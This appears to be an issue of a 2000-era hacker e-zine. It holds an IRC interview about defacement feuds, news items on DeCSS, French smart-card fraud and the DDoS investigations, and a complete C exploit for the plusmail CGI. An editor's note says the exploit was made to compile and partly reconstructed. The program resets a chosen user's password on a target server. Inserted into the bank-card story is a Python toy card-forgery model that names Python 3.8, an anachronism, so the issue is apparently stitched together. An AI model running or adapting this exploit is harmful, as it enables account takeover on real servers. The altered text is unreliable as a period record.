[15:43] initially sect0r said he and you were 'ok' after the defacement log incident
[15:44] yeah i thought we were ok too
[15:44] "He" claims i'm a wannabe with no skills,
[15:44] this is funny since it was only the other day he asked me
[15:44] to deface a web site for him
[15:45] hrm
[15:45] "He" claims he could have redefaced my stuff easily
[15:45] this is funny again since he had to come and ask me to do his chores.
[15:45] yeah in the interview he said
[15:45] [20:03] i had someone akicked from #hackers on dalnet,
[15:45] the kid retaliated, what can i say?
[15:45] And even if he did know how to redeface my stuff he wouldn't have gotten
[15:45] very far since I patched all the boxes I hacked.
[15:45] [20:04] that would be blazinweed, he is basically a
[15:45] wannabe with no skills to speak of.
[15:45] [20:04] i would have re-defaced his stuff easily
[15:45] (nt boxen), but i'm not down with that anymore.
[15:45] ...
[15:45] He also highlights the fact
[15:45] that they were only NT boxes that were defaced. well i'd like to respond to this by saying i only deface NT boxes because i have no use for them but the unix boxes I keep. btw he runs windows :D
[15:45] good point
[15:46] I'd also like to say a few things about the plusmail exploit
[15:46] that he and ytcracker talked about. I've never heard so much bull ever.
[15:46] the Hole was found by Herf (of wkD which is my group also)
[15:46] but people take notice of defacements because they are 'public' and summarily judge people in the 'scene' by their web 'hacks'
[15:46] and all it required was a simple html file that you loaded in your browser
[15:46] which then allowed you to bypass the login screen on dumb servers running plusmail. btw the scanner was written by ytcracker and it was useless anyway since next to no servers run the vulnerable package and the ones that do have long since patched it.
[15:47] This is the reason you didn't see it get a slot at securityfocus.
[15:47] * plusmail cgi exploit
[15:47] - missnglnk
[15:47] greets: herf, ytcracker, mosthated, tino
[15:47] that one? or a variant
[15:47] variant
[15:47] ok
[15:47] thats on packetstorm btw
[15:47] I was one of the first people to have it
[15:48] http://packetstorm.securify.com/0001-exploits/plusmail.c
[15:48] hrm
[15:49] have you confronted sect0r about his comments?
[15:49] if so what happened
[15:49] if not why not
[15:49] :)
[15:49] he left before i could
[15:50] someone found all his personal info
[15:50] nod I'm aware of that
[15:50] and he is gone to hide
[15:52] anything else you'd like to say? there isn't that much we haven't covered really
[15:53] we don't need to drag it out
[15:53] :)
[15:53] :D
[15:53] I think i've readdressed the balance
[15:53] do you guys have a site for instance?
[15:53] website that is
[15:53] yeah but its private
[15:54] if you think of anything to add lemme know
[15:54] ok
[15:54] my email is cruciphux@dok.org
[15:54] thanks
[15:54] if i'm not online
[15:54] tnx
[15:54] -end-
Session Close: Sun Mar 19 15:55:19 2000

@HWA

07.0 plusmail cgi exploit
~~~~~~~~~~~~~~~~~~~~

(The copy below is the packetstorm plusmail.c cleaned up so it compiles: the
header names were eaten along with the HTML literals inside the string
constants when this issue was put together, so those two spots are marked
as reconstructed. What it does: one POST to /cgi-bin/plusmail sets a new
password for the given user, then the page the server sends back is
rewritten so its form points at the target and served once on a local port
so you can load it in a browser. - Ed)

/*
 * plusmail cgi exploit - missnglnk
 * greets: herf, ytcracker, mosthated, tino
 */
#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/param.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

static void usage(const char *prog)
{
    printf("plusmail cgi exploit by missnglnk\n");
    printf("%s [-h hostname/ip ] [-p target port] [-u username] [-n newpassword] [-l optional local port]\n", prog);
}

/* Append formatted text at the end of buf. The original did this with
 * snprintf(htmldata, ..., "%s%s", htmldata, line), which passes the
 * destination as a source and is undefined behaviour. */
static void html_append(char *buf, size_t bufsz, const char *fmt, ...)
{
    size_t used = strlen(buf);
    va_list ap;

    if (used >= bufsz - 1)
        return;
    va_start(ap, fmt);
    vsnprintf(buf + used, bufsz - used, fmt, ap);
    va_end(ap);
}

int main(int argc, char **argv)
{
    int argswitch, tport = 80, sockfd, clntfd, plen, lport = 4040;
    socklen_t cltlen;
    ssize_t n;
    char *target = NULL, *password = "default", *username = "jackdidntsetone";
    char *tmpline, *firstline;
    char tmpdata[32768], origdata[32768], htmldata[32768], pdata[1024];
    struct sockaddr_in rmt, srv, clt;
    struct hostent *he;
    in_addr_t ip;

    if (argc < 5) {
        usage(argv[0]);
        return -1;
    }
    while ((argswitch = getopt(argc, argv, "h:p:u:n:l:v")) != -1) {
        switch (argswitch) {
        case 'h':
            if (strlen(optarg) > MAXHOSTNAMELEN) {
                printf("ERROR: Target hostname too long.\n");
                return -1;
            }
            target = optarg;
            break;
        case 'p':
            tport = atoi(optarg);
            break;
        case 'n':
            if (strlen(optarg) > 8) {
                printf("Password length greater than 8 characters.\n");
                return -1;
            }
            password = optarg;
            break;
        case 'u':
            if (strlen(optarg) > 8) {
                printf("Username length greater than 8 characters.\n");
                return -1;
            }
            username = optarg;
            break;
        case 'l':
            lport = atoi(optarg);
            break;
        case '?':
        default:
            usage(argv[0]);
            return -1;
        }
    }
    if (target == NULL) {       /* original went on to resolve a NULL pointer */
        usage(argv[0]);
        return -1;
    }

    memset(&rmt, 0, sizeof(rmt));
    memset(&srv, 0, sizeof(srv));
    memset(&clt, 0, sizeof(clt));
    memset(htmldata, 0, sizeof(htmldata));
    cltlen = sizeof(clt);

    if ((he = gethostbyname(target)) != NULL) {
        memcpy(&ip, he->h_addr, sizeof(ip));
    } else if ((ip = inet_addr(target)) == INADDR_NONE) {   /* original compared to NULL */
        fprintf(stderr, "Error resolving target %s\n", target);
        return -1;
    }
    rmt.sin_family = AF_INET;
    rmt.sin_addr.s_addr = ip;
    rmt.sin_port = htons(tport);
    srv.sin_family = AF_INET;
    srv.sin_addr.s_addr = INADDR_ANY;
    srv.sin_port = htons(lport);

    if ((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
        perror("Error creating socket");
        return -1;
    }
    if (connect(sockfd, (struct sockaddr *) &rmt, sizeof(rmt)) < 0) {
        perror("Error connecting");
        return -1;
    }

    /* The password change: password1 is plusmail's confirmation field. */
    snprintf(pdata, sizeof(pdata), "username=%s&password=%s&password1=%s&new_login=missnglnk",
             username, password, password);
    plen = strlen(pdata);
    snprintf(tmpdata, sizeof(tmpdata),
             "POST /cgi-bin/plusmail HTTP/1.0\r\n"
             "Referer: http://www.pure-security.net\r\n"
             "User-Agent: Mozilla/4.08 [en] (X11; I; SunOS 5.7 missnglnk)\r\n"
             "Host: %s\r\n"
             "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\r\n"
             "Accept-Encoding: gzip\r\n"
             "Accept-Language: en\r\n"
             "Accept-Charset: iso-8859-1,*,utf-8\r\n"
             "Content-type: application/x-www-form-urlencoded\r\n"
             "Content-length: %d\r\n"
             "\r\n%s", target, plen, pdata);
    if (write(sockfd, tmpdata, strlen(tmpdata)) < (ssize_t) strlen(tmpdata)) {
        perror("Error writing data");
        return -1;
    }

    /* Read the reply (status line, headers and body) and rebuild it line by
     * line into htmldata. The original looped on read() != 0, which spins
     * forever on an error return and never NUL-terminated the buffer. */
    while ((n = read(sockfd, tmpdata, sizeof(tmpdata) - 1)) > 0) {
        tmpdata[n] = '\0';
        strncpy(origdata, tmpdata, sizeof(origdata) - 1);
        origdata[sizeof(origdata) - 1] = '\0';
        firstline = strtok(tmpdata, "\n");
        if (firstline != NULL && strstr(firstline, "404") != NULL) {
            printf("plusmail.cgi aint here buddy.\n");
            return -1;
        }
        for (tmpline = strtok(origdata, "\n"); tmpline != NULL; tmpline = strtok(NULL, "\n")) {
            if (strstr(tmpline, "<form") != NULL || strstr(tmpline, "<FORM") != NULL) {
                /* RECONSTRUCTED: the HTML literal here was lost in extraction.
                 * Its job is to make the saved page's form post back to the
                 * target's plusmail instead of to a relative URL. */
                html_append(htmldata, sizeof(htmldata),
                            "<form action=\"http://%s/cgi-bin/plusmail\" method=\"post\">\n", target);
            } else {
                html_append(htmldata, sizeof(htmldata), "%s\n", tmpline);
            }
        }
    }
    if (close(sockfd) < 0) {
        perror("Error closing socket");
        return -1;
    }
    /* RECONSTRUCTED: closing tags lost in extraction; the signature survived. */
    html_append(htmldata, sizeof(htmldata), "\n<missnglnk>\n");

    /* Serve the rewritten page once on the local port. */
    if ((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
        perror("Error creating socket");
        return -1;
    }
    printf("waiting on port %d...", lport);
    fflush(stdout);
    if (bind(sockfd, (struct sockaddr *) &srv, sizeof(srv)) < 0) {
        perror("Error binding to socket");
        return -1;
    }
    if (listen(sockfd, 1) < 0) {
        perror("Error setting backlog");
        return -1;
    }
    if ((clntfd = accept(sockfd, (struct sockaddr *) &clt, &cltlen)) < 0) {
        perror("Error accepting connection");
        return -1;
    }
    printf("connection from %s:%d\n", inet_ntoa(clt.sin_addr), ntohs(clt.sin_port));
    /* original wrote sizeof(htmldata), i.e. the whole 32K buffer, and
     * declared clntfd as a char */
    if (write(clntfd, htmldata, strlen(htmldata)) < 0) {
        perror("Error writing data");
        return -1;
    }
    if (close(clntfd) < 0) {
        perror("Error closing socket");
        return -1;
    }
    printf("\n%s\n", htmldata);
    return 0;
}

@HWA

08.0 2600 activism against the MPAA
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.2600.com/
http://www.2600.com/news/2000/0130.html

February 2, 2000
FOR IMMEDIATE RELEASE

DAY OF ACTION PLANNED AGAINST MOTION PICTURE ASSOCIATION IN 100 CITIES

Members of the hacker and open source communities worldwide, along with various civil liberties groups, are planning a massive leafletting campaign on Friday, February 4 to call attention to the recent attempts by the Motion Picture Association of America to shut down thousands of websites. Lawsuits have been filed against hundreds of people, as well as an Internet Service Provider and a magazine, for having information the MPAA wants to keep secret.

The controversy centers around a computer program known as DeCSS, thought to be written by a 16 year old in Norway. The program defeats the encryption scheme used by DVDs which prohibits them from being viewed on non-approved machines or computers. It also enables DVDs from one country to be played in another, contrary to the wishes of the movie industry. It does NOT facilitate DVD piracy - in fact, copying DVDs has been possible since their introduction years ago.
In its press releases on the subject, the MPAA has claimed that this is a piracy issue and they have subsequently succeeded in getting injunctions against a number of sites that had posted the program in the interests of free speech.

This is in effect a lawsuit against the entire Internet community by extremely powerful corporate interests. The lawsuit and the various actions being planned promise to be a real showdown between two increasingly disparate sides in the technological age. The consequences of losing this case are so serious that civil libertarians, professors, lawyers, and a wide variety of others have already stepped forward to help out.

Friday's action will be coordinated in 74 cities throughout North America and 26 cities in other parts of the world. Leafletting will take place outside theaters and video stores in these cities - all of which participate in a monthly "2600" gathering. 2600 Magazine has been named in two lawsuits regarding the DeCSS program and has joined with the growing number of people who will fight these actions by the MPAA until the end.

The lawsuit has been filed by the Motion Picture Association of America, Columbia/Tristar, Universal City Studios, Paramount Pictures, Disney Enterprises, Twentieth Century Fox, Metro-Goldwyn-Mayer Studios, and Time Warner Entertainment.

Contact: Emmanuel Goldstein (631) 751-2600 ext. 0

leaflet campaign:
~~~~~~~~~~~~~~~~~

CALL TO ACTION
01/30/00

Thousands of copies of the flyer have already been distributed at movie theaters worldwide. Versions are also being made in different languages. The next step will involve a massive action this Friday, February 4, 2000. We call on all 2600 meetings held around the world on that day to head to the local theaters and spread the word of this travesty of justice by handing out as many flyers as possible.

Everyone is invited to show up and participate, bring your friends, tell your local Linux User Group, spread the news to any organization you're part of, and join us in advocating justice. We find that once people are made aware of the facts of the case, they become as outraged as we have.

TIPS FOR HANDING OUT FLYERS

First, make sure you make the flyers distinctive by printing on colored paper if at all possible. The quickest way to do this is to go to a copy shop. Get several hundred at the very least - you WILL go through them quickly. Make sure you can print more if you need them.

Familiarize yourself with the facts of the case as presented on www.opendvd.org. It's important to be able to answer questions of people who are interested in learning more. Remember, this is NOT about DVD piracy - that is how the movie industry is trying to portray this case. The issue here is CONTROL of players - whether you have the right to play DVDs on the computer of your choice and whether you should be able to see DVDs from other countries - as well as our freedom to continue reporting on the events, developments and discoveries of the hacker community, in a full and accurate manner.

We find that people respond well to "Protect Your Rights" as a catch phrase to get them to take the flyer. Let us know if others work for you.

Be courteous to the people passing by - don't block their path and, if they ignore you or even make a snide remark, don't heckle them. We find that the vast majority of people are polite and interested in what you have to say. You'll find that some will even come up to you asking for more flyers!

Have a set of master copies (printed on white paper) for others to make copies of their own and hand out in other places.

If you are asked to leave by theater management, cooperate and ask them where they would like you to stand. They can't force you to leave the area, only the part that is their property.
You can still successfully hand out material to everyone coming and going by positioning yourself in neighboring areas or even in the parking lot. If things become unpleasant, simply head to another theater in a different part of town. (If you run out of theaters, you can always fall back on video stores.) We find that 90% of such confrontations can be averted by befriending security guards and making it clear that you don't intend to be disruptive.

@HWA

09.0 Microsoft sends magazine full versions of Windows 2000
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Contributed by TRDonJuan
(Translated from the German PC-WELT report; the original ran at the URL below.)
http://www.pcwelt.de/content/news/newwindows/2000/03/xn160300005.html

Win 2000 free on CD

Microsoft has inadvertently given away 100,000 copies of Windows 2000, worth around 33 million dollars, to private users. As the Spanish news service Brujula.com reports, Microsoft had actually intended to put the 120-day limited version of the operating system on the cover CDs bundled with around 100,000 copies of "PC World", the Spanish sister publication of PC-WELT.

It later turned out, however, that the software was a version with no time limit, complete with a registration code. As a result, 100,000 installations of Windows 2000 are in circulation without a license. At a retail price of 330 dollars per copy, Microsoft may have suffered a financial loss of 33 million dollars.

Who caused the mistake has not yet been officially established. Insiders assume, however, that Microsoft itself, and not the magazine, is responsible for the mishap. Some even whisper that Microsoft deliberately put the full version on the CDs to drive up Windows 2000 sales figures and then declared the whole thing an accident: because of the monopoly position the software giant is accused of holding, it could not officially give the operating system away. In any case, the issue of PC World Spain that carried the CD-ROM set a sales record.

(PC-WELT, 16.03.2000, sp)

@HWA

10.0 HNN:Mar 13th:Mexican Rebels Breached Pentagon Security
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by William Knowles

According to Arthur L. Money, the chief information officer of the US Defense Department, Mexican Zapatista guerrillas managed to breach the online security systems of some Pentagon computers in 1998. Money said that the intruders used systems from the Frankfurt Stock Exchange to launch their attacks.

Agence France-Press - via Nando Times
http://www.techserver.com/noframes/story/0,2294,500179791-500236658-501166899-0,00.html
(Sorry: 404 or expired story link)

@HWA

11.0 HNN:Mar 13th:Online Guerrilla War Rages In Brazil
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond

Online warez groups fighting amongst each other are now considered guerrilla warfare by authorities in Brazil.
According to the daily O Globo the Brazilian Hacker Organization (OHB) and the Anti-OHB have been trading insults via web defacements for some time. The Sao Paulo Civil Police Cybercrime Unit is also following attacks by three other active organizations: Hatted Copr, InfernBr and Crime Boys.

EFE via COMTEX - via Northern Light
http://library.northernlight.com/FC20000310060000049.html?cb=0&dx=1006&sc=0#doc
(Pay to play document sorry ... - Ed)

@HWA

12.0 HNN:Mar 13th:French Bank Card Algorithm Released
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by alan.hop

Serge Humpich was given a ten month suspended sentence after notifying the French interbank card group Cartes Bancaires that its bank cards were vulnerable to fraud. Now the secret that Humpich discovered has been released to the Internet. Bank officials say that the potential for fraud or fake cards is small while security experts fear that the underground will flood the market with fake cards within weeks.

Reuters - via Yahoo
http://dailynews.yahoo.com/h/nm/20000310/wr/france_cards_1.html

Friday March 10 3:07 PM ET

Card Alert for French Banks
By Catherine Bremer

PARIS (Reuters) - France braced for a wave of petty fraud after officials admitted on Friday that a formula posted on the Internet showed how to forge smart payment cards.

But Cartes Bancaires, the French interbank group whose card system is affected, said there was no danger that bank accounts would be emptied.

Cards made with the formula might be used to buy train tickets or pay parking meters or toll booths although there was no evidence this had actually happened, Cartes Bancaires spokesman Herve de Lacotte told Reuters.

``For the first time in 10 years, a lock has been sprung,'' he said. ``But springing a lock will not necessarily open the door and let you in. There is a theoretical risk of fraud but the problem concerns banks, not consumers or shops.''

Despite claims to the contrary, Lacotte said, false cards made with the code could not be used in cash dispensers, to make shop purchases or for expensive goods.

Newspapers leaped on the story, quoting experts as saying the complex 96-digit code could be used to forge three in four of France's 34 million bank cards. Headlines like ``Chip card secret out'' left anyone with a bank card wondering whether their money was safe.

``Consumers have been paying for bank cards that aren't even secure. They've been cheated and lied to,'' said Eric April, Secretary-General of the AFOC consumer group.

Lacotte said the scare stories were over the top and the Bank of France accused the press of ``exaggerating the risk.''

``Even if certain clues relating to this algorithm have been made public... other security measures exist enabling strong limits on the use that can be made of this information,'' the French central bank said in a statement.

Cards issued since last autumn had added security which meant the pirate formula would not work for them, he added. SCSSI, the government body in charge of information security systems, urged banks to replace older cards with updated ones.

The card formula was posted anonymously on an Internet chat site last weekend. It was actually discovered three years ago by computer whizz kid Serge Humpich, who denies using it or circulating it but has been given a 10-month suspended prison sentence for cracking the banks' secret.

Now that it is public, Humpich says, pirates could buy a chip card kit for around $370 and be turning out false cards within weeks.

``A few weeks from now dozens of false cards are going to appear,'' he told Liberation.
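(The "sprung lock that doesn't open the door" distinction above is the one thing in this story worth understanding, so here is an added toy model of it, written for this issue and not taken from the Reuters piece or from Cartes Bancaires. The article never says what the "formula" is; this example ASSUMES it is the issuer's private key for a signature over static card data, and that the secret was recovered by factoring a modulus that was too small. The key, account numbers and balances are all constructed for the demo. - Ed)

```python
"""Toy model: a published card-signing key defeats offline terminals but not online
authorization. Added illustration; the scheme and all values are assumptions."""
import hashlib

# Constructed toy issuer key. A real key is hundreds of bits; these primes are
# tiny so the "recover the secret" step below finishes in well under a second.
TOY_P = 1000003
TOY_Q = 1000033
TOY_E = 65537

# Constructed bank-side account table, consulted only by online authorization.
KNOWN_ACCOUNTS = {"4970000000000001": 2500, "4970000000000002": 40}


def make_issuer_key(p=TOY_P, q=TOY_Q, e=TOY_E):
    """Return (n, e, d): public modulus, public exponent, private exponent."""
    n = p * q
    phi = (p - 1) * (q - 1)
    d = pow(e, -1, phi)          # modular inverse, Python 3.8+
    return n, e, d


def _card_digest(account, expiry, n):
    """Hash the static card data down to a number below the modulus."""
    data = f"{account}|{expiry}".encode()
    return int.from_bytes(hashlib.sha256(data).digest(), "big") % n


def issue_card(account, expiry, d, n):
    """Personalize a card: static data plus the issuer's signature over it."""
    sig = pow(_card_digest(account, expiry, n), d, n)
    return {"account": account, "expiry": expiry, "sig": sig}


def terminal_accepts_offline(card, n, e):
    """A parking meter or toll booth has only the public key: it checks the
    signature and nothing else, so any correctly signed data is accepted."""
    expected = _card_digest(card["account"], card["expiry"], n)
    return pow(card["sig"], e, n) == expected


def recover_private_exponent(n, e):
    """What 'the secret is out' means: factor n, recompute d. Trial division,
    which only works because the toy modulus is tiny."""
    p = 3
    while p * p <= n and n % p != 0:
        p += 2
    if n % p != 0:
        raise ValueError("modulus not factored: prime or too large for trial division")
    q = n // p
    return pow(e, -1, (p - 1) * (q - 1))


def bank_authorizes_online(card, accounts, amount=1):
    """A cash dispenser asks the bank, which looks the account up. A forged
    number that exists on no ledger fails here no matter how good the signature."""
    return accounts.get(card["account"], 0) >= amount


def demo():
    """Legit card passes both checks; a forged card passes offline only."""
    n, e, d = make_issuer_key()
    legit = issue_card("4970000000000001", "12/01", d, n)
    d_leaked = recover_private_exponent(n, e)
    forged = issue_card("4970999999999999", "12/05", d_leaked, n)
    return {
        "legit_offline": terminal_accepts_offline(legit, n, e),
        "legit_online": bank_authorizes_online(legit, KNOWN_ACCOUNTS),
        "forged_offline": terminal_accepts_offline(forged, n, e),
        "forged_online": bank_authorizes_online(forged, KNOWN_ACCOUNTS),
    }


if __name__ == "__main__":
    for check, result in demo().items():
        print(f"{check:15s} {'accepted' if result else 'REFUSED'}")
```

The point the spokesman was making falls straight out: once d is public, issue_card() works for anyone and every offline terminal is fooled, which is exactly the train-ticket and parking-meter fraud the article describes, while the online path still fails because signing data does not create an account. Cards "issued since last autumn" that the formula does not work for would, in this model, simply be signed under a different, larger key.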
@HWA 13.0 HNN:Mar 13th:Still No Suspects in DDoS Attacks ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond Investigators are still sifting through mountains of log files but are having a rough time tracing the recent denial of service attacks against online giants Yahoo, ZD Net, CNN, and others. Officials still do not have any suspects and hope that more traditional methods will allow them to locate the culprit(s). San Jose Mercury News http://www.mercurycenter.com/svtech/news/indepth/docs/hack031000.htm Posted at 8:28 p.m. PST Thursday, March 9, 2000 No suspects in cyberattacks Investigators try to track down origin of last month's assaults BY DAVID L. WILSON Mercury News Washington Bureau WASHINGTON -- Federal authorities are continuing to investigate last month's series of attacks on commercial Internet sites, but sources close to the investigation say they have no suspects yet. Investigators are sifting through mountains of data, trying to track the attacks back to their origin using logs from the computers involved, but they concede that building a case using such methods may be difficult, if not impossible. Some believe that a break in case is more likely to come from more traditional methods. ``Often what you see in a cold case is a lead coming from someone who is in custody on an unrelated minor charge who offers information in return for a get-out-of-jail-free card,'' said one person with ties to the investigation. ``If somebody brags that he was behind this, eventually somebody else will roll over on him.'' Often, however, the braggarts are blowing smoke. For instance, a 17-year-old who goes by the moniker ``Coolio'' hinted in online chats that he was behind at least some of the attacks. But federal authorities say there is no evidence that the youth, Dennis Moran of Wolfboro, N.H., was involved. 
However, Wednesday Moran was charged with two counts of unauthorized access to a computer system in connection with vandalism to the Los Angeles Police Department Web site DARE.com. In last month's attacks on popular Web sites such as Yahoo, eBay and CNN, suspects used a specialized technique known as a distributed denial of service attack. The technique depends on stealth software that has been secretly installed on hundreds of computers connected to the Internet. At a given signal, the programs attack a targeted Web site, flooding it with so much data that normal business is impossible. Investigators are using log files from the computers infected with the stealth software, hoping to track the trail back to the individual who installed the programs, but they have been unsuccessful so far. The difficulties investigators face were summed up in a 60-page report the federal government released Thursday. In a news conference discussing the report, Attorney General Janet Reno said law enforcement faces a number of challenges in cyberspace. ``These challenges include the inability to trace criminals who hide their identities online, difficulty in finding criminals who might be located in other jurisdictions, the need for better coordination among law enforcement agencies, and the need for trained personnel at all levels of law enforcement,'' Reno told reporters. The report generally said that existing laws could deal with crimes in cyberspace. In addition, while highlighting advantages criminals can gain from anonymity on the Internet, the report stressed that anonymity is both important and useful for average citizens. It suggested that any proposed changes in the availability and use of anonymity must be considered very carefully. Despite the report's measured tone, some groups feared a loss of privacy for individuals who could find their every movement in cyberspace tracked if they couldn't maintain anonymity. 
The American Civil Liberties Union blasted the report in a letter to Reno. ``An end to Internet anonymity would chill free expression in cyberspace,'' the letter declared. ``However, the report treats the anonymity of Internet users as a `thorny issue' rather than a constitutional right.''

Administration officials said the report was merely a starting point for an examination of security in cyberspace, and that the government was fully committed to maintaining privacy for Internet users.

Contact David L. Wilson at (202) 383-6020 or dwilson@sjmercury.com

@HWA

14.0 HNN:Mar 13th:Japanese Pirates Busted
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN
http://www.hackernews.com/

contributed by Evil Wench

In a report released on March 10th, the Associated Computer Software Copyright Society (ACCS) disclosed two recent cases of piracy involving Internet bulletin boards. A Hokkaido University student living in Sapporo was arrested for selling as many as 30 illegal copies of Microsoft's Office 2000 Professional and other software. He charged a total of 500,000 yen (US$4,693.51) for the CDR copies. A 24-year-old worker living in Takasaki, Gunma prefecture was also recently arrested for advertising and selling illegal software via an Internet bulletin board. He sold software to 20 people for 100,000 yen (US$938.70). He said that he began selling pirated software after he purchased some in the same way.

Asia Biz Tech
http://www.nikkeibp.asiabiztech.com/wcs/leaf?CID=onair/asabt/news/96759

Pirated Software Sales Rampant on Internet Bulletin Board

March 13, 2000 (TOKYO) -- A series of recent cases have revealed the extent to which Internet bulletin boards are being used in Japan to sell pirated software.

The Associated Computer Software Copyright Society (ACCS) disclosed the extent of the situation on March 10. In just the last 10 days, two cases of copyright violation have been brought to light by the Metropolitan Police Agency and the Aichi Prefecture Police.

On Feb. 29, the Metropolitan Police Agency submitted documents to the Tokyo District Public Prosecutors Office regarding the activities of a 22-year-old Hokkaido University student living in Sapporo. The student was using an electronic bulletin board to advertise the sale of pirated software and was accepting orders via e-mail. The items included Microsoft's Office 2000 Professional as well as other office and game software copied to CD-R disks without the copyright holders' permission.

Between February and October 1999, the student reportedly sold illegally copied software to some 30 individuals nationwide for a total of about 500,000 yen. (106.53 yen = US$1)

The other incident, uncovered by the high-tech crime unit of the Aichi Prefecture Police, involved a 24-year-old worker living in Takasaki, Gunma prefecture. A report on the suspect was submitted to the Nagoya District Public Prosecutors Office on March 1.

Like the Sapporo student, the suspect is accused of using a bulletin board operated by a leading Internet service provider to advertise the sale of pirated software and accept online orders. The accused is believed to have sold the software to 20 people during the course of about one month, generating some 100,000 yen in sales. He reportedly confessed that he began selling pirated software after buying it in a similar manner himself.

(BizTech News Dept.)

@HWA

15.0 HNN:Mar 13th:Online Handles Impose Fear
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN
http://www.hackernews.com/

contributed by Weld Pond

Are the handles chosen by online hooligans an attempt to impose fear? Matt Richtel of the NY Times attempts to explore the meanings of some of the more glamorous handles of the online world. (Too bad he completely misses the personal privacy angle. And what about entertainers like Sting, Madonna, John Cougar, or Prince?)

NY Times
http://www.nytimes.com/library/review/031200hacker-handles-review.html

(Pay to play url... sorry -Ed)

@HWA

16.0 HNN:Mar 13th:Vendors Still Making Insecure Software
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN
http://www.hackernews.com/

contributed by Weld Pond

At a recent congressional panel examining the threat to federal and private-sector computer networks, cyber security experts blamed software manufacturers for failing to improve the security features of most consumer software. (People in the underground have been saying this for years.)

Reuters - via Excite
http://news.excite.com/news/r/000309/15/net-tech-hacker

(Server: We're sorry, but this story is not currently available - Ed)

@HWA

17.0 HNN:Mar 14th:Smart Card Inventor Issues Challenge
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN
http://www.hackernews.com/

contributed by acoplayse

Roland Moreno, inventor of the smart cards that have slashed the fraud rate in France by 90 percent in 10 years, rejected claims that an algorithm posted on a Web chat site last week could bypass the cards' safeguards. He is so confident of his product that he is offering a million francs ($148,100) to anyone who could prove that they could read a bank's confidential code from the card. Moreno went on to claim that "chip cards are an unpenetrable data system." (So unpenetrable that Serge Humpich recently received a 10 month suspended sentence for defeating the system.)

Reuters
http://newsnet.reuters.com/cgi-bin/basketview.cgi?b=rcom:science&s=nL133221

From above url; "Boston conventions threaten biotech food fight"... (Appears to be incorrectly linked .. not having much luck following up articles this week :/ sorree .. - Ed)

@HWA

18.0 HNN:Mar 14th:MPAA Continues to Harass In Fight Over DeCSS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN
http://www.hackernews.com/

contributed by Macki

In the past two months the Motion Picture Association of America has continued to harass and intimidate Internet users all over the world.
Letters have been sent, threats have been levied, ISPs have crumbled, people have been fired from their jobs and worse. The fight is not over.

2600
http://www.2600.com/news/2000/0312.html

Open DVD
http://www.opendvd.org/

@HWA

19.0 HNN:Mar 14th:Tracking Down Coolio
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN
http://www.hackernews.com/

contributed by Carlos

Log file analysis and a search engine, those were the most complicated tools needed to track down Coolio (Dennis Moran). Coolio was charged last week with defacing the Dare.org web site. (And this is what the FBI wants all that extra money for?)

Associated Press - via ABC News
http://www.abcnews.go.com/sections/tech/DailyNews/coolio000313.html

On the Trail of a Hacker
Court Papers Reveal How Cyber Gumshoe Tracked Teen

Dennis Moran, 17, who goes by the name "Coolio" on the Internet, talks with reporters March 8, near his Wolfeboro, N.H., home after being questioned by the FBI about crippling attacks on major Web sites in February. (Ken Williams/Concord Monitor/AP Photo)
http://www.abcnews.go.com/media/Tech/images/ap_hacker_000313_h.jpg

The Associated Press

W O L F E B O R O, N.H., March 13

Recently released court records explain how authorities traced the hacking attack on a popular anti-drug Web site to a Wolfeboro teenager.

Dennis Moran, 17, was charged last week with hacking into the Web site of DARE.org and defacing it with pro-drug abuse slogans and images. He has acknowledged he vandalized the Los Angeles-based site and two others, but said he was only joking when he claimed responsibility for the attacks that crippled Yahoo, eBay and other major sites last month.

Court records released Friday show police began investigating Moran after noticing his Internet nickname, Coolio, on the defaced DARE.org site in November. At the bottom of the Web site were the messages "Coolio is k-r4d and so are drugs" and "Craftily owned by Coolio :D."

Searching in Cyberspace

Los Angeles Police Detective Michael Brausman used a search engine to find a Web page that included an e-mail address for coolio@k-r4d.com. He traced the address to another site that included a directory labeled Coolio. Inside the directory was one of the images posted on the DARE site.

By late December, the detective had contacted the owner of an Arizona-based server who confirmed he had e-mail messages related to the Coolio directory. A search of the server's logs showed someone using the e-mail address coolio@k-r4d.com had sent messages that included Moran's name, address and phone number.

In one message, Moran inquired about registering cool.io as an Internet domain name. "If there's any way I could buy the domain for this, please email me pricing and information. Thanks, Dennis Moran," he wrote.

Brausman called Wolfeboro police Dec. 30. Investigators interviewed Moran on Feb. 17.

Moran faces two state charges of unauthorized access to a computer system. Each felony is punishable by up to 15 years in prison and a $4,000 fine.

Although Moran also was questioned by the FBI about several denial of service attacks on major commercial sites, including Yahoo.com and eBay.com, no charges have been filed in those cases. Investigators said they were seeking someone using the Internet signer Coolio in those attacks, but also said the name is used by many people online.

@HWA

20.0 HNN:Mar 14th: DOJ Launches Cybercrime Site
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN
http://www.hackernews.com/

contributed by Evil Wench

